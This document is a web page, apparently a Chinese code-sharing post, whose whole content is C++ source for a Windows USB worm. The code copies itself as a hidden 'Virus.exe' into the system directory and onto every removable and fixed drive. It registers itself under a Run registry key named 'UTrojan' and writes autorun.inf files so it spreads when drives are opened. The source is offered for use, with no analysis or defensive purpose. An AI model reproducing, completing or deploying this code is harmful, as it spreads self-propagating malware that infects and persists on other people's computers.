C++ U盘感染程序源码

C++ U盘感染程序源码

print?#include "stdafx.h"#include <stdio .h>#include <windows .h>HANDLE hMutex;//信号量句柄DWORD WINAPI infect(LPVOID lpParam);//感染void Install(void); //安装void InfectOtherDisk();//感染其它盘char ExeFile[MAX_PATH];//==========================================================================void Install(void){char FilePath[255]={0};char Explorer[12]="explorer ";HKEY AutoStart;STARTUPINFO si;PROCESS_INFORMATION pi;ZeroMemory( &si, sizeof(si) );si.cb = sizeof(si);ZeroMemory( &pi, sizeof(pi) );if(GetSystemDirectory(FilePath,254) == 0){return;}strcat(FilePath, "\\Virus.exe");CopyFile(ExeFile, FilePath, true);RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0, KEY_ALL_ACCESS, &AutoStart);RegSetValueEx(AutoStart, // subkey handle"UTrojan", // value name0, // must be zeroREG_SZ, // value type(LPBYTE) FilePath, // pointer to value datastrlen(FilePath) + 1); // length of value dataRegCloseKey(AutoStart);strcpy(FilePath,ExeFile); //now use FilePath[] as tempFilePath[3]='\0';strcat(Explorer,FilePath);CreateProcess( NULL, //open the directory of U-stick as usualExplorer,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi );return;}//==========================================================================DWORD WINAPI infect(LPVOID lpParam){char Drives[255];int DriveType;char *pDrive=0;char FilePath[25];FILE *AutoRun;while(true){memset(Drives,0,255);memset(FilePath,0,25);pDrive=Drives;DriveType=0;AutoRun=NULL;GetLogicalDriveStrings(254,Drives);while(pDrive[0]!=NULL){DriveType=GetDriveType(pDrive);if(DriveType!=DRIVE_REMOVABLE){pDrive+=4;continue;}strcpy(FilePath,pDrive);strcat(FilePath,"Virus.exe");SetFileAttributes(FilePath,FILE_ATTRIBUTE_NORMAL);DeleteFile(FilePath);CopyFile(ExeFile, FilePath,false);SetFileAttributes(FilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);strcpy(FilePath,pDrive);strcat(FilePath,"autorun.inf");SetFileAttributes(FilePath,FILE_ATTRIBUTE_NORMAL);DeleteFile(FilePath);AutoRun=fopen(FilePath,"w+");if(AutoRun!=NULL){fputs("[AutoRun]\n",AutoRun);fputs("open=Virus.exe\n",AutoRun);fputs("shellexecute=Virus.exe\n",AutoRun);fputs("shell\\Auto\\command=Virus.exe",AutoRun);}fclose(AutoRun);SetFileAttributes(FilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);pDrive+=4;}Sleep(3000); //every 3sec to detect whether a U-stick exits}return 0;}//==========================================================================void InfectOtherDisk(void){char Drives[255];int DriveType;char *pDrive=0;char AppFilePath[25];char InfFilePath[25];memset(Drives,0,255);memset(AppFilePath,0,25);memset(InfFilePath,0,25);pDrive=Drives;DriveType=0;GetLogicalDriveStrings(254,Drives);while(pDrive[0]!=NULL){DriveType=GetDriveType(pDrive);if(DriveType==DRIVE_FIXED){strcpy(AppFilePath,pDrive);strcpy(InfFilePath,pDrive);strcat(AppFilePath,"Virus.exe");strcat(InfFilePath,"autorun.inf");CopyFile(ExeFile,AppFilePath, true);SetFileAttributes(AppFilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);CopyFile("autorun.inf",InfFilePath,true);SetFileAttributes(InfFilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);pDrive+=4;}else{break;}}}//==========================================================================int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow){// TOD Place code here.int DriveType;GetModuleFileName(NULL,ExeFile,MAX_PATH);//得到此程序的路径if((hMutex=CreateMutex(NULL,true,"UTrojan"))==NULL){return 0;}DriveType=GetDriveType(NULL);if(DriveType==DRIVE_REMOVABLE){Install();InfectOtherDisk();ReleaseMutex(hMutex);return 0;}else if (DriveType==DRIVE_FIXED){InfectOtherDisk();CreateThread(NULL,NULL,infect,NULL,NULL,NULL);return 0;}else{return 0;}}</windows></stdio>